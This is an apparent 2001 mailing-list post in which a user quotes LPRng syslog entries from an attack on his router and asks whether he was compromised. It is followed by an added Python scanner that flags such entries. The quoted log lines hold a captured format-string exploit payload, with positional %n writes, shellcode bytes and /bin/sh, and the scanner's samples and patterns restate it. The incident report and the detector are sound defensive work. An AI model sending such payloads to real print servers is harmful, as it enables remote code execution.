
Got hacked by Ramen-style attack



On Thu, 22 Nov 2001 12:06:21 Thomas Amm wrote:

Hi all,

that's what I found in my logs after I had to reboot my router, which also worked as print server (now I know better), because of a DoS.


Nov 21 03:29:36 lan1 -- MARK --
Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line 
'BBÜóÿ¿Ýóÿ¿Þóÿ¿ßóÿ¿XXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u
%303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ?ÐÍ
ÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
Nov 21 03:32:10 lan1 SERVER[2758]: Dispatch_input: bad request line 
'BB(ñÿ¿)ñÿ¿*ñÿ¿+ñÿ¿XXXXXXXXXXXXXXXXXX%.232u%300$n%.199u%301$nsecurity.i%302$n%.1
92u%303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ
?ÐÍÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
Nov 21 03:32:11 lan1 SERVER[2759]: Dispatch_input: bad request line 'BBH 
(and so on) - the lpr.log shows the same entries.

I searched the system for fragments of the Ramen worm after reboot but I found nothing suspicious.
The attack seemed to come over nmbd, although all ports, except inetd, are blocked to the outside via ipchains. I had a number of rejected packets to port 137 immediately before; nmbd crashed and the lprng exploit started.
So there are some questions I would like to pose:
Is Woody's lprng still vulnerable? I've got the latest version.
Is the shown exploit a sign that someone already was in there, or just an attempt?
Can I find possible backdoors, or will I have to re-install?

Thanks,

-- 
Things are more like they are today than they ever were before.
		-- Dwight Eisenhower
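Added example, not part of Thomas Amm's post or of LPRng: a small Python scanner that picks the LPRng "Dispatch_input: bad request line" entries out of a syslog and flags the ones carrying positional %n format directives, a /bin/sh string or a long filler run, which is what the entries quoted above look like. The log lines it runs on are constructed stand-ins modelled on the post; the request bodies are placeholders, not the captured bytes.

```python
import re
from dataclasses import dataclass

# Constructed sample syslog lines modelled on the LPRng entries in the post above.
# The request bodies are stand-ins: "<binary>" replaces the non-printable payload bytes.
SAMPLE_LOG = """\
Nov 21 03:29:36 lan1 -- MARK --
Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u%303$n<binary>/bin/sh'
Nov 21 03:32:10 lan1 SERVER[2758]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.232u%300$n%.199u%301$nsecurity.i%302$n<binary>/bin/sh'
Nov 21 03:33:02 lan1 SERVER[2760]: Dispatch_input: bad request line 'GET /index.html HTTP/1.0'
"""

# Syslog line layout as LPRng logs it: timestamp, host, SERVER[pid], then the rejected request.
BAD_REQUEST = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) SERVER\[(?P<pid>\d+)\]: "
    r"Dispatch_input: bad request line '(?P<req>.*)'$"
)
# "%N$n" writes the number of bytes printed so far to the N-th argument; a legitimate
# LPD request line never contains one, so each hit is a format-string write attempt.
POSITIONAL_N = re.compile(r"%\d+\$n")
# 16 or more identical consecutive bytes: the filler run seen before the directives.
PADDING_RUN = re.compile(r"(.)\1{15,}")


@dataclass
class Finding:
    pid: int
    ts: str
    n_writes: int      # number of positional %n directives in the request line
    has_shell: bool    # literal "/bin/sh" present in the request line
    has_padding: bool  # long run of one repeated byte present

    @property
    def suspicious(self) -> bool:
        return self.n_writes > 0 or self.has_shell


def scan_lprng_log(text: str) -> list[Finding]:
    """Return one Finding per 'bad request line' entry that looks like a format-string attack."""
    findings = []
    for line in text.splitlines():
        m = BAD_REQUEST.match(line)
        if not m:
            continue  # MARK lines and unrelated entries are skipped
        req = m.group("req")
        f = Finding(pid=int(m.group("pid")), ts=m.group("ts"),
                    n_writes=len(POSITIONAL_N.findall(req)),
                    has_shell="/bin/sh" in req,
                    has_padding=PADDING_RUN.search(req) is not None)
        if f.suspicious:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan_lprng_log(SAMPLE_LOG):
        print(f"{f.ts} pid={f.pid} %n-writes={f.n_writes} shell={f.has_shell} padding={f.has_padding}")
```

A plain "bad request line" with none of the three indicators (the third sample entry) is left alone, so the scanner separates malformed-but-harmless requests from exploit attempts rather than alerting on every rejected request.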
